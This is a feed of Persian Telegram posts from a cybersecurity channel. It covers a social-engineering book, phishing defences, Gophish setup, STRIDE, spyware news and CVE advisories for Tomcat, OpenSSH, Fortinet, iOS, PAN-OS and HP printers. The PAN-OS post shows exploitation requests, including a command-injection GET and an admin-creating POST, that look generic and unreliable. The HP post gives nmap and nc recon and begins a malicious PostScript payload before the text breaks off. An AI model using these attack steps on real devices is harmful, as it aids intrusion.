✅ نمونه کتاب راهنمای عملی مهندسی اجتماعی برای سازمان‌ها
👈 شامل: فهرست کتاب و مقدمه

💳 لینک خرید کتاب:
☺️ https://lian.ac/brf

💵 کدتخفیف 20% : social-20

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

کاش شرایط جوری بود که می‌تونستیم بوت‌کمپ‌های رایگان بیشتری رو قرار بدیم.
همین‌جا از اساتیدی که مایل هستن تو برگزاری بوت‌کمپ‌های رایگان (۱۰ الی ۱۴ساعت) همکاری داشته باشن، دعوت می‌کنم که از طریق آی‌دی زیر با من در تماس باشند:
@vahid_elmi

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

✅ نسخه چاپی کتاب آماده ارسال شد.

💳 لینک خرید کتاب:
☺️ https://lian.ac/brf

💵 کدتخفیف 20% : social-20

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

🎙 تو قسمت دوم، در مورد پیشنیازهای اولیه برای ورود به حوزه امنیت سایبری صحبت کردم.
🔗 لینک CastBox:
https://lian.ac/Srd

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

👈 تو کتاب "راهنمای عملی مهندسی اجتماعی برای سازمان‌ها" یه صحبتی در مورد PhishTank شده که اینجا می‌خوام یکمی در موردش صحبت کنم.
همون‌طور که می‌دونیم ایمیل‌های فیشینگ معمولا و به ظاهر از سمت یه سازمان معروف و شناخته شده ارسال می‌شن و هدف‌شون هم سرقت اطلاعات شخصی شما مثل شماره کارت اعتباری، اطلاعات هویتی و یوزرنیم و پسورده. و برای اینکه هکر بتونه با موفقیت اطلاعات شخصی شمارو "فیش" کنه، باید شمارو وادار کنه که از ایمیلی که براتون ارسال کرده، وارد یه وبسایتی بشین (که جعلیه). اینطوری هم هست که به قید فوریت و ایجاد استرس و تهدید (مثل این مورد که اگه کاری رو انجام ندین، حساب‌تون مسدود میشه)، شمارو ترغیب به کلیک روی لینک داخل ایمیل می‌کنن. لینکی که شمارو هدایت می‌کنه به سمت سایتی که اطلاعات شخصی شمارو ازتون درخواست می‌کنه.
❕ حالا PhishTank چیه و چه کمکی می‌تونه بکنه؟
فیش‌تانک یه دیتابیس و سرویس آنلاینه که هدفش از راه‌اندازی، مبارزه علیه حملات فیشینگه. فیش‌تانک با جمع‌آوری اطلاعات در مورد صفحات فیکی که برای حملات فیشینگ طراحی شدن، به شناسایی و مقابله با این تهدیدات کمک می‌کنه.
❕ فیش‌تانک چطور کار می‌کنه؟
فیش‌تانک اول میاد با استفاده از یه سری روش‌های مختلف (از گزارش‌های کاربرا گرفته تا اسکن خودکاری و همکاری با بقیه سازمان‌ها)، اطلاعات مربوط به صفحات فیشینگ رو جمع می‌کنه. بعدش میاد اطلاعاتی که جمع کرده رو آنالیز می‌کنه و صفحات فیشینگ رو براساس ویژگی‌های مختلفی مثل دامنه، محتوا و تکنیک‌هایی که توش استفاده شده، طبقه‌بندی می‌کنه. بعدش هم این اطلاعاتی که جمع‌شون کرده و طبقه‌بندی هم کرده رو با بقیه سازمان‌ها و ابزارهای امنیتی به اشتراک می‌زاره و در نهایت یه API هم ارائه می‌ده که به دولوپرها و ریسرچرها اجازه بده تا بدون هزینه به دیتای ضدفیشینگ دسترسی داشته باشن و با برنامه‌های خودشون ادغامش کنن.
در نهایت هم بگم که PhishTank رو مرکز Talos سیسکو داره اداره می‌کنه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ Apache Tomcat Vulnerability (CVE-2024-56337): RCE Risk Alert (CVSS: 9.8)

⚠️ Denoscription:
Users running Tomcat on a case insensitive file system with the default servlet write enabled (readonly initialisation parameter set to the non-default value of false) may need additional configuration to fully mitigate CVE-2024-50379 depending on which version of Java they are using with Tomcat.

⚠️ Affected Versions:
Tomcat 11.0.0-M1 to 11.0.1 (Fixed in 11.0.2+)
Tomcat 10.1.0-M1 to 10.1.33 (Fixed in 10.1.34+)
Tomcat 9.0.0.M1 to 9.0.97 (Fixed in 9.0.98+)

⚠️ Mitigation:
Users of the affected versions should apply one of the following mitigations:
- Upgrade to Apache Tomcat 11.0.2 or later
- Upgrade to Apache Tomcat 10.1.34 or later
- Upgrade to Apache Tomcat 9.0.98 or later
- running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true)
- running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false)
- running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed)

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

👈 ایمن‌سازی ایمیل‌ها

با تکامل فناوری ایمیل، فناوری‌های محافظت از اون هم تکامل پیدا کردن و با تکامل این فناوری‌ها، الگوهای حمله هم تکامل و تغییر پیدا کردن و مثل هر موضوع دیگه‌ای تو حوزه امنیت اطلاعات، یه بازی مداوم موش و گربه اینجا هم وجود داره. با گذشت زمان متخصصای امنیت انواع مختلفی از استانداردها رو برای بحث امنیت ایمیل پیشنهاد و تصویب کردن. وقتی صحبت از ایمن‌سازی ایمیل می‌شه، سه مورد اصلی وجود داره:

• Domain Keys Identified Mail (DKIM)
• Sender Policy Framework (SPF)
• Domain-based Message Authentication Reporting Conformance (DMARC)

❕این سه استاندارد چکاری انجام می‌دن؟

یه تصور غلط رایج اینه که این استانداردها ایمیل‌های مارو از حمله‌های فیشینگ یا جعلی ورودی، محافظت می‌کنن؛ تا حدودی این کارو انجام می‌دن، اما دقیق‌ترش اینه که اونارو بعنوان محافظت از شهرت و برند باید توصیف کنیم. اگر ما یه ایمیل رو با پیاده‌سازی این استانداردها ارسال کنیم و دامنه گیرنده برای بررسی رکوردهای مرتبط پیکربندی شده باشه، می‌تونن تلاش‌های جعل دامنه مارو تشخیص بدن.
به طور خلاصه SPF بررسی می‌کنه که آیا هاست یا آدرس IP تو لیست فرستده هست، DKIM یه امضای دیجیتال ارسال می‌کنه و DMARC، هم SPF و هم DKIM رو پیاده‌سازی می‌کنه. DMARC گزارش‌دهی رو هم ایجاد می‌کنه و SPF پایین‌ترین استاندارد امنیتی در نظر گرفته میشه.

⚠️ نکته قابل‌توجه اینه که گیرنده باید سرورهای ایمیل خودش رو برای بررسی راهنمایی از فرستنده در مورد استانداردها و سپس انجام واقعی اقدامات پیکربندی کنه.

- برگرفته از کتاب مهندسی اجتماعی برای سازمان‌ها

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

سلام.
من عادت دارم وقتی تو ماشین هستم پادکست گوش کنم و طبق عادت امروز هم از چنل رخ، شروع کردم انتخاب پادکست. موضوعی که توجهم رو جلب کرد این بود که با موضوع زندگی‌نامه "کوین میتنیک" پادکستی ساختن که واقعا جالب و شنیدنی هست. دوستانی که تو حوزه امنیت فعال هستن احتمالا حداقل یکبار اسم میتنیک به گوش‌شون خورده. ایشون رو با لقب‌های "بزرگ‌ترین هکر قرن" و "پدر مهندسی اجتماعی" می‌شناسن. به نظرم جالب هست که زندگی‌نامه یکی از مهم‌ترین شخصیت‌های حوزه‌مون رو بدونیم. البته ایشون تو جولای 2023 از دنیا رفتند.

⬅️ قسمت اول:
https://lian.ac/RDG
⬅️ قسمت دوم:
https://lian.ac/XvC
⬅️ قسمت سوم:
https://lian.ac/SqC

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

👈 معرفی ابزار Gophish

⬅️یکی از ابزارهایی که که تو کتاب "راهنمای عملی مهندسی اجتماعی برای سازمان‌ها" در موردش صحبت کردیم، Gophish هست. Gophish یه فریم‌ورک اوپن‌سورس برای شبیه‌سازی حملات فیشینگه که برای اهداف آموزشی و تست امنیت سازمانا طراحی شده. این ابزار به زبون برنامه‌نویسی Go نوشته شده و در حقیقت یه ابزار خودکار شبیه‌سازیه حملات فیشینگه. برای استفاده از Gopish نیاز به یه سرور SMTP برای ارسال ایمیل از طریق اون و یه وب‌سرور برای لیندینگ تارگت‌هامون داریم. با اینکه میشه هر دو مورد رو داخل Gophish هندل کرد، اما انجام اینکار باعث میشه شانس شناسایی‌مون هم بالا بره.
برای اینکه این ریسک شناسایی کمتر بشه پیشنهاد می‌شه این سه رول داخل فایروال ست بشن:
✅ فقط از شبکه خودتون اجازه دسترسی به پورت TCP/3333 (پورت رابط وب مدیریت) Gophish و پورت 22 (SSH) رو بدین.
✅ فقط از شبکه خودتون و محدوده IP تارگت اجازه دسترسی به پورت TCP/80 (پورت پیش‌فرض برای صفحه لندینگ شما، گرچه می‌تونین از پورت 443 با یک سرتیفیکیت SSL/TLS برای واقع‌گرایی بیشتر استفاده کنین) رو بدین.
✅ فقط تو جهت خروجی به پورت TCP/25 (پورت برای ترافیک SMTP) اجازه دسترسی بدین.

⬅️ویژگی‌های مهم Gophish:
✅ شبیه‌سازی حملات فیشینگ
✅ مدیریت آسون کمپین‌ها
✅ شخصی‌سازی حملات
✅ گزارش‌دهی و تجزیه و تحلیل
✅ پشتیبانی از ایمیل‌ها و صفحات فیشینگ با طراحی سفارشی
✅ ادغام با سیستم‌های دیگه

⚠️ برای نصب Gopish هم می‌تونین از دستورات زیر استفاده کنین:

cd /opt/
git clone https://github.com/gophish/gophish
cd gophish
apt-get install golang -y
go get github.com/gophish/gophish
go build

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ آسیب‌پذیری بحرانی در OpenSSH با شناسه CVE-2024-6387

❕ یه آسیب‌پذیری با شدت high تو پروتکل OpenSSH کشف شده که به هکرها اجازه می‌ده بدون نیاز به احراز هویت و بصورت ریموت و با دسترسی کامل با یوزر root، کد دل‌خواه خودش رو روی سیستم هدف اجرا کنن و این یعنی کنترل کامل روی سیستم آسیب‌پذیر.

❕ علت اصلی بوجود اومدن این آسیب‌پذیری، race condition هست (وقتی اتفاق میفته که چن‌تا فرآیند به‌طور همزمان به یه سورس مشترک دسترسی پیدا می‌کنن و ترتیب اجرای اونا می‌تونه روی نتیجه نهایی تاثیر بزاره). در مورد این آسیب‌پذیری، race condition تو نحوه مدیریت سیگنال‌های دریافتی که توسط SSH دریافت می‌شه، اتفاق میفته.

❕ برای رفع آسیب‌پذیری توسعه‌دهنده‌های OpenSSH خیلی سریع یه نسخه جدید رو منتشر کردن که این آسیب‌پذیری داخلش برطرف شده.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

🟢 مهندس امینی لطف کردن و یه دوره رایگان مربوط به بحث جرم‌شناسی حافطه (Memory Forensics) رو رکورد کردن و داخل آپارات به رایگان قرار دادن. این دوره ۲۱ کلیپ آموزشی داره و از لینک زیر قابل دسترس هست:

https://www.aparat.com/playlist/1569341

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ گزارش تحلیلی و آماری
⚠️ از حملات DDoS علیه زیرساخت‌های کشور در فصل پاییز 1403
⚠️ ارائه توسط شرکت ارتباطات زیرساخت

✅ خلاصه این گزارش:
‌
✅ تعداد حمله‌ها: به صورت میانگین روزانه ۶۳۵ حمله، مجموعا ۵۷,۲۱۸ حمله
✅ حجم حمله‌ها: میانگین ۳۶.۴۳ گیگابایت بر ثانیه و مجموعا ۱۲.۵۸ پتابایت در کل پاییز
✅ میانگین مدت زمان حمله‌ها: ۴دقیقه و ۳۷ ثانیه
✅ طولانی‌ترین حمله: ۴ روز و ۹ ساعت و ۵۰ دقیقه
✅ بیشترین تعداد حمله هم‌زمان: ۱۴۸ حمله
✅ منابع حمله‌ها: ۶۴ درصد حملات از ۱۰ کشور، بیش از ۱۵ درصد از روسیه، سپس اندونزی (۱۰٪) و اوکراین (۵٪)
✅ روش‌ها: از هر ۱۰۰ حمله ۳۵ حمله (۳۵٪) از طریق شبکه دستگاه‌های آلوده (Bot Pool)
‌‌
✅هدف‌های با بیشترین حمله‌ها:
✅ ۱۸٪: شرکت‌های اینترنت سیار
✅ ۱۷٪: کسب‌وکارهای اینترنتی
✅ ۱۴٪: شرکت‌های اینترنت ثابت
‌
✅ مقاصد پرحمله: ۵۰۰ مقصد بیش از ۲۵۰ بار مورد حمله قرار گرفتند.
✅ حمله‌های کوتاه و کم‌حجم: بیشترین حملات در محدوده زیر ۲ گیگابایت بر ثانیه و کمتر از ۵ دقیقه
✅ سرویس‌های آسیب‌پذیر: اپراتورهای همراه، کسب‌وکارهای اینترنتی، اپراتورهای ثابت و درگاه‌های خدمات آنلاین

🚨 نقش دستگاه‌های آلوده: بسیاری از این حملات با استفاده از دستگاه‌های آلوده کاربران و بدون اطلاع آن‌ها انجام شده است.
‌
🚨 نتیجه کلی: فیلترینگ گسترده و نصب اپلیکیشن‌های فیلترشکن مختلف توسط کاربرها (به ناچار)، نقش مهمی در در افزایش این حملات داشته است و دستگاه کاربرهای زیادی بدون اینکه بدانند، در این حمله‌ها مشارکت دارد!

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ آسیب‌پذیری با شناسه CVE-2024-55591 یه نقص امنیتی بحرانی تو محصولات Fortinet، شامل FortiOS و FortiProxy، هست که به هکرها اجازه می‌ده با ارسال درخواست‌های خاص به ماژول WebSocket تو Node.js، احراز هویت رو بایپس کنن و به سطح دسترسی «سوپر ادمین» برسن. این آسیب‌پذیری تو نسخه‌های زیر تأیید شده:

FortiOS نسخه‌های 7.0.0 تا 7.0.16

FortiProxy نسخه‌های 7.0.0 تا 7.0.19 و 7.2.0 تا 7.2.12


این نقص به‌عنوان «دور زدن احراز هویت با استفاده از مسیر یا کانال جایگزین» (CWE-288) طبقه‌بندی می‌شه. مهاجم با ارسال درخواست‌های دستکاری‌شده به ماژول WebSocket تو ۸ Node.js می‌تونه کنترل کامل دستگاه ره به دست بگیره.

شاخص‌های سازشی (IoC):

ورودهای لاگ زیر ممکنه نشون‌دهنده اکسپلویت از این آسیب‌پذیری باشن:

ورود موفق ادمین با رابط کاربری "jsconsole" و آدرس‌های IP مثل 1.1.1.1 یا 127.0.0.1:

type="event" subtype="system" level="information" vd="root" logdesc="Admin login successful" user="admin" ui="jsconsole" method="jsconsole" srcip=1.1.1.1 action="login" status="success" profile="super_admin" msg="Administrator admin logged in successfully from jsconsole"

ایجاد حساب ادمین با نام کاربری تصادفی:

type="event" subtype="system" level="information" vd="root" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" cfgpath="system.admin" cfgobj="vOcep" msg="Add system.admin vOcep"


توجه داشته باشید که آدرس‌های IP ذکرشده ممکنه توسط مهاجم به‌صورت دلخواه تنظیم شده باشن و لزوماً نشون‌دهنده منبع واقعی حمله نیستن.

راهکارها:
1. به‌روزرسانی نرم‌افزار:
برای FortiOS: به نسخه 7.0.17 یا بالاتر ارتقا بدین.
برای FortiProxy: به نسخه 7.0.20 یا 7.2.13 یا بالاتر ارتقا بدین.

2. غیرفعال‌سازی رابط مدیریتی HTTP/HTTPS:
در صورت امکان، این رابط‌ها رو غیرفعال کنین یا دسترسی به اونارو محدود کنین.

3. محدود کردن دسترسی به رابط مدیریتی:
با استفاده از پالیسی‌های لوکال (local-in policies)، دسترسی به رابط مدیریتی رو به آدرس‌های IP مشخص محدود کنین.

4. استفاده از یوزرنیم‌های غیرمعمول برای ادمین:
استفاده از یوزرنیم‌های پیچیده و غیرقابل حدس برای حساب‌های ادمین می‌تونه تا حدی از اکسپلویت جلوگیری کنه.

توجه داشته باشین که این آسیب‌پذیری به‌طور فعال در حال بهره‌برداریه و توصیه می‌شه اقدامات لازم را تو اسرع وقت انجام بدین.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ رویترز گزارشی داده مبنی بر اینکه یه شرکت اسرائیلی به اسم Paragon Solutions با استفاده از جاسوس‌افزارش، حدود ۹۰ کاربر واتساپ، از جمله روزنامه‌نگارا و فعالای مدنی تو بیشتر از ۲۰ کشور رو هدف قرار داده. که البته گفته شده این حملات تو دسامبر ۲۰۲۴ شناسایی و متوقف شدن.
روش نفوذ به‌صورت "Zero-Click" انجام شده‌؛ به این معنی که تارگت بدون نیاز به کلیک یا تعامل با محتوای مخرب، آلوده شده‌. تو این روش، هکرها فایلای PDF حاوی کدهای مخرب رو برای تارگت ارسال کردن که با باز کردن این فایلا، جاسوس‌افزار به‌صورت خودکار فعال می‌شده.
جاسوس‌افزار Graphite، محصول Paragon، قادره به دیتای شخصی کاربرا دسترسی پیدا کنه، از جمله:
✅خوندن پیامای رمزنگاری‌شده
✅دسترسی به مخاطبین
✅دسترسی به موقعیت جغرافیایی
✅فعال‌سازی میکروفون و دوربین دستگاه

✅ واتساپ بعد از شناسایی این حمله، با ارسال نامه‌ای به Paragon، خواسته که فعالیتاشون تو این حمله رو متوقف کنن و اعلام کرده که به دفاع از حریم خصوصی کاربران خودش ادامه می‌ده.
✅ شرکت اسرائیلی Paragon Solutions که توسط افسرای سابق واحد ۸۲۰۰ ارتش اسرائیل تأسیس شده، ادعا می‌کنه که ابزارای خودش رو تنها به دولتای دموکراتیک و برای مقاصد قانونی می‌فروشه. از نظر من فعالیتشون خیلی شبیه شرکت NSO و انگاری بعد از افشای فعالیتای اون شرکت، اومدن تو قالب این شرکت دارن فعالیتشون رو ادامه می‌دن. قبلا یه پادکستی در مورد شرکت NSO و پگاسوس تولید کردم که ‌می‌تونین از لینک زیر گوش بدین:

🎹 CastBox

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

💠 مدل‌سازی تهدید (Threat Modeling) یه فرآیند تحلیلیه که برای شناسایی، ارزیابی و کاهش تهدیدات امنیتی تو سیستم‌های نرم‌افزاری و شبکه‌ها استفاده می‌شه. هدف از مدل‌سازی تهدید شناسایی آسیب‌پذیری‌ها قبل از وقوع حملات سایبری و ارائه راهکارهای مناسب برای کاهش ریسکه.
یکی از متودولوژی‌هایی که تو این حوزه شناخته شده‌اس، فریم‌ورک STRIDE هست که توسط شرکت مایکروسافت توسعه داده شده و برای شناسایی، دسته‌بندی و ارزیابی تهدیدات امنیتی تو سیستم‌های نرم‌افزاری و شبکه‌ها ازش استفاده می‌شه.

⬅️ کلمه STRIDE از حروف اول شش کلمه تشکیل شده:
✅حرف S: مخفف Spoofing به مفهوم جعل هویت کاربران
✅حرف T: مخفف Tampering به مفهوم دستکاری دیتاها
✅حرف R: مخفف Repudiation به مفهوم انکار اقدامات
✅حرف I: مخفف Information Disclosure به مفهوم افشای اطلاعات
✅حرف D: مخفف Denial of Service به مفهوم جلوگیری از ارائه سرویس
✅و حرف E: مخفف Elevation of Privilege به مفهوم ارتقای سطح دسترسی غیرمجاز

✅ جعل هویت (Spoofing):
تو این حمله، مهاجم هویت یه کاربر، فرآیند یا سیستم دیگه رو جعل می‌کنه تا دسترسی غیرمجاز به اطلاعات و منابع داشته باشه.
🔴مثال‌های رایج:
🔘جعل آدرس IP برای ورود غیرمجاز به شبکه
🔘حملات فیشینگ برای سرقت اطلاعات ورود

✅ دستکاری داده‌ها (Tampering):
تو این حمله، مهاجم دیتاهای تو حال ترنسفر یا ذخیره‌شده رو تغییر می‌ده تا اطلاعات مخرب یا نادرست جایگزین بشن.
🔴مثال‌های رایج:
🔘حمله Man-in-the-Middle (MITM) برای تغییر پیام‌های ارسال‌شده
🔘دستکاری دیتابیس‌ها برای تغییر اطلاعات کاربران

✅ انکار عملیات (Repudiation):
این نوع تهدید وقتی رخ می‌ده که کاربر یا مهاجم بعد از انجام یه عملیات، اون رو انکار کنه و سیستم مدرکی برای اثبات اون نداشته باشه.
🔴مثال‌های رایج:
🔘کاربری که تراکنش مالی رو انجام داده اما انکار می‌کنه.
🔘ارسال ایمیل جعلی و ادعای اینکه این ایمیل ارسال نشده.

✅ افشای اطلاعات (Information Disclosure):
این نوع تهدید وقتی رخ می‌دهه که دیتاهای محرمانه در اختیار افراد غیرمجاز قرار بگیرن.
🔴مثال‌های رایج:
🔘نشت اطلاعات شخصی کاربران از دیتابیس‌های عمومی.
🔘عدم استفاده از HTTPS که باعث لو رفتن دیتاها تو حملات شنود می‌شه.

✅ جلوگیری از ارائه سرویس (Denial of Service - DoS):
این نوع حمله باعث می‌شه که یه سیستم یا سرویس، دیگه تو دسترس کاربرای مجاز نباشه.
🔴مثال‌های رایج:
🔘حملات DDoS که باعث مصرف بیش از حد منابع سرور می‌شه.
🔘ارسال حجم زیادی از درخواست‌های جعلی به یه سرور وب.

✅ ارتقای دسترسی غیرمجاز (Elevation of Privilege):
تو این حمله، مهاجم دسترسی‌های خودش رو از سطح عادی به سطح مدیر (Administrator) افزایش می‌ده.
🔴مثال‌های رایج:
🔘حمله Buffer Overflow برای اجرای کدهای مخرب با سطح دسترسی بالا.
🔘دور زدن مکانیزم‌های احراز هویت و اجرای دستورات سیستمی.

⬅️ نحوه پیاده‌سازی STRIDE تو امنیت سیستم‌ها:

✅ مدل‌سازی تهدیدات (Threat Modeling)
🔴شناسایی تمام اجزای سیستم (مثل سرورها، دیتابیس‌ها، APIها و کاربران)
🔴تحلیل و بررسی مسیرهای دیتا و نقاط حساس تو سیستم
🔴استفاده از ابزارهایی مثل Microsoft Threat Modeling Tool

✅ دسته‌بندی تهدیدات بر اساس STRIDE
🔴بررسی اینکه هر جز سیستم، در برابر کدوم نوع از تهدیدات STRIDE آسیب‌پذیره

✅ پیاده‌سازی راه‌کارهای امنیتی
🔴رمزگذاری دیتاها، احراز هویت قوی، بررسی لاگ‌ها و استفاده از فایروال‌ها

✅ نظارت و تست امنیتی
🔴اجرای تست نفوذ (Penetration Testing) و ارزیابی امنیتی به‌صورت دوره‌ای

پ.ن: این محتوا برگرفته از کتاب "راهنمای معماری امنیت سایبری" هست. برای تهیه این کتاب می‌تونین به آی‌دی @liantrain پیام بدین.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ یه آسیب‌پذیری با شناسه CVE-2025-24200 منتشر شده که یه نقص امنیتی تو دستگاه‌های iPhone و iPadه که به مهاجمای فیزیکی امکان می‌ده حالت محدودیت USB رو تو دستگاه‌های قفل‌شده غیرفعال کنن. این آسیب‌پذیری به دلیل یه مشکل تو مدیریت وضعیت مجوزها به وجود اومده. حالت محدودیت USB قابلیتیه که ارتباط دستگاه با لوازم جانبی USB رو بعد از یه ساعت عدم استفاده، محدود می‌کنه تا از دسترسی غیرمجاز به دیتاها جلوگیری بشه. این آسیب‌پذیری به مهاجم فیزیکی اجازه می‌ده تا با غیرفعال کردن حالت محدودیت USB، به دیتاهای حساس دستگاه دسترسی پیدا کنه یا بدافزار رو نصب کنه.

✅ جزئیات فنی:
✅نوع آسیب‌پذیری: مشکل در مدیریت مجوزها (Authorization Issue)
✅شناسه: CVE-2025-24200
✅امتیاز CVSS: 6.1 (متوسط)
✅بردار حمله: دسترسی فیزیکی (AV:P)
✅پیچیدگی حمله: پایین (AC:L)
✅سطح دسترسی مورد نیاز: بدون نیاز به دسترسی (PR:N)
✅تأثیر بر محرمانگی: بالا (C:H)
✅تأثیر بر یکپارچگی: بالا (I:H)
✅تأثیر بر دسترس‌پذیری: ندارد (A:N)

⬅️ برای محافظت از دستگاه‌هاتون در برابر این آسیب‌پذیری، توصیه می‌شه سیستم‌عامل دستگاه رو به آخرین نسخه به‌روزرسانی کنین. برای این کار، به مسیر Settings > General > Software Update برید و دستورالعمل‌ها رو دنبال کنین.
⬅️ این آسیب‌پذیری توسط بیل مارزاک از Citizen Lab تو دانشگاه تورنتو کشف شده. اپل اعلام کرده که از گزارش سواستفاده از این نقص تو یه حمله بسیار پیچیده علیه افراد خاص، مطلع شده.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ آسیب‌پذیری CVE-2025-0108 یه نقص امنیتی با شدت بالا تو نرم‌افزار PAN-OS شرکت Palo Alto Networksه که به مهاجم اجازه می‌ده تا بدون نیاز به احراز هویت، به پنل مدیریتی Palo Alto Networks PAN-OS دسترسی پیدا کنه. این کار از طریق بایپس مکانیزم احراز هویت تو صفحات مدیریتی وب انجام می‌شه. به طور خلاصه، این آسیب‌پذیری از یه نقص منطقی (Logic Flaw) تو بررسی اعتبار کاربر ناشی می‌شه که باعث می‌شه بعضی از درخواست‌ها بدون نیاز به توکن ورود (Session Token) پردازش بشن.

✅ دسته‌بندی آسیب‌پذیری:
✅نوع: دور زدن احراز هویت (Authentication Bypass)
✅سطح خطر: بالا
✅هدف: سیستم‌عامل امنیتی PAN-OS که تو فایروال‌های Palo Alto Networks استفاده می‌شه
✅حملات محتمل: دسترسی غیرمجاز به پنل مدیریت، اجرای کد PHP، تغییر تنظیمات امنیتی

✅ روش‌های سوءاستفاده از آسیب‌پذیری CVE-2025-0108

⬅️ یک: اجرای درخواست بدون احراز هویت
مهاجم می‌تونه با ارسال یک درخواست (HTTP Request) دستکاری‌شده به سرور PAN-OS، احراز هویت رو دور بزنه.

GET /php/system.php HTTP/1.1
Host: target-firewall
User-Agent: Mozilla/5.0

ری‌کوئست بالا بدون نیاز به لاگین، به سرور ارسال میشه و تو بعضی نسخه‌های آسیب‌پذیر، سرور پاسخ معتبر ارسال می‌کنه. اگه این صفحه مدیریتی دسترسی به اسکریپت‌های PHP داشته باشه، مهاجم می‌تونه دستورات مخرب اجرا کنه.

⬅️ دو: اجرای کد مخرب تو محیط PHP
از اونجایی که PAN-OS بعضی اسکریپت‌های PHP اجرایی داره، اگه مهاجم موفق بشه از صفحات بدون احراز هویت ری‌کوئست‌هایی بفرسته که به پارامترهای ورودی PHP دسترسی دارن، می‌تونه کد دلخواه رو اجرا کنه.

GET /php/admin.php?cmd=whoami HTTP/1.1
Host: firewall-target

اگر سرور پاسخ بده:

admin

نشان می‌ده که مهاجم می‌تونه دستورات سیستمی رو روی سرور اجرا کنه.

⬅️ سه: تغییر تنظیمات فایروال و ایجاد کاربر جدید
اگه مهاجم موفق به ارسال ری‌کوئست معتبر بدون احراز هویت بشه، می‌تونه:
یه کاربر جدید تو سیستم ایجاد کنه.
رول‌های فایروال رو تغییر بده و ترافیک رو به نفع خودش route کنه.
تنظیمات لاگ رو غیرفعال کنه تا فعالیت‌های مخرب شناسایی نشه.
مثال درخواست مخرب برای ایجاد یه کاربر جدید:

POST /php/api.php HTTP/1.1
Host: target-firewall
Content-Type: application/json

{
  "action": "createUser",
  "username": "hacker",
  "password": "SuperSecretPass",
  "role": "admin"
}

اگه سرور آسیب‌پذیر باشه، ری‌کوئست بالا یه حساب ادمین جدید برای مهاجم ایجاد می‌کنه.

✅ چطور از این حمله جلوگیری کنیم؟
✅آپدیت فوری PAN-OS به نسخه‌ای که در برابر این آسیب‌پذیری مقاومه.
✅محدود کردن دسترسی به اینترفیس مدیریتی فقط از طریق VPN یا آی‌پی‌های مجاز.
✅فعال‌سازی احراز هویت دو مرحله‌ای (2FA) برای دسترسی به پنل.
✅بررسی لاگ‌ها و تلاش‌های مشکوک برای ورود غیرمجاز.

✅ این آسیب‌پذیری یکی از خطرناک‌ترین نقاط ضعف امنیتی PAN-OS تو سال 2025 محسوب می‌شه و توسط گروه‌های هکری برای دور زدن فایروال سازمان‌ها و کنترل شبکه‌های حساس مورد استفاده قرار گرفته.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⚠️ آسیب‌پذیری با شناسه CVE-2025-26506 تو پرینترهای HP

آسیب‌پدیری با شناسه CVE-2025-26506 تو پرینترهای HP شناسایی شده. این آسیب‌پذیری از نوع Stack-Based Buffer Overflow - CWE-121ه که موقع پردازش فایل‌های PostScript تو پرینترهای HP رخ می‌ده. تو این نوع حمله، ورودی فراتر از اندازه بافر تعیین‌شده به داخل استک نوشته می‌شه، که در صورت اکسپلویت موفق، می‌تونه منجر به RCE بشه. هکر می‌تونه با ارسال یه فایل PostScript مخرب، کد دلخواهش رو بصورت ریموت اجرا کنه و سطح دسترسیش رو افزایش بده.

⬅️ بردار حمله (Attack Vector)
مهاجم برای اکسپلویت این آسیب‌پذیری، یه فایل PostScript مخرب رو به پرینتر ارسال می‌کنه. این کارو می‌تونه از طریق روش‌های زیر انجام بده:
✅ پورت‌های شبکه‌ای باز پرینتر (مانند 9100/TCP, LPD, IPP)
✅ اتصال مستقیم از طریق USB (در صورتی که فایل تو صف چاپ قرار بگیره)
✅ استفاده از ایمیل یا اشتراک شبکه (ارسال فایل PostScript مخرب به تارگتی که اون رو برای چاپ ارسال کنه)
پس از پردازش فایل، مقدار زیادی دیتا به بافر استک نوشته می‌شه که باعث خرابی حافظه می‌شه و کنترل پردازش رو به هکر منتقل می‌کنه.

⬅️ سناریوی بهره‌برداری (Exploitation)

🔹 گام 1: شناسایی سیستم هدف
هکر ابتدا باید تعیین کنه که آیا پرینتر هدف، جز مدل‌های آسیب‌پذیر هست یا نه. این کار از طریق دو روش زیر می‌تونه انجام بشه:
اسکن شبکه با استفاده از ابزارهایی مثل nmap:

nmap -p 9100,515,631 -A -T4 <target-IP>
or
nmap -p 9100,515,631 --noscript hp-jetdirect-info -O -sV <target-IP>

اگه پورت 9100 (JetDirect), پورت 515 (LPD) یا 631 (IPP) باز باشه، پرینتر مستعد حمله‌اس.
بررسی بنر دستگاه:

nc <target-IP> 9100

بعضی پرینترها تو ریسپانس، اطلاعات مربوط به مدل و فریمور رو ارسال می‌کنن.

🔹 گام 2: ایجاد یه فایل PostScript مخرب
پست‌اسکریپت یه زبان توصیف صفحه‌اس که توسط خیلی از پرینترها پشتیبانی می‌شه. یه نمونه کد مخرب برای سرریز بافر می‌تونه به این شکل باشه:

%!PS
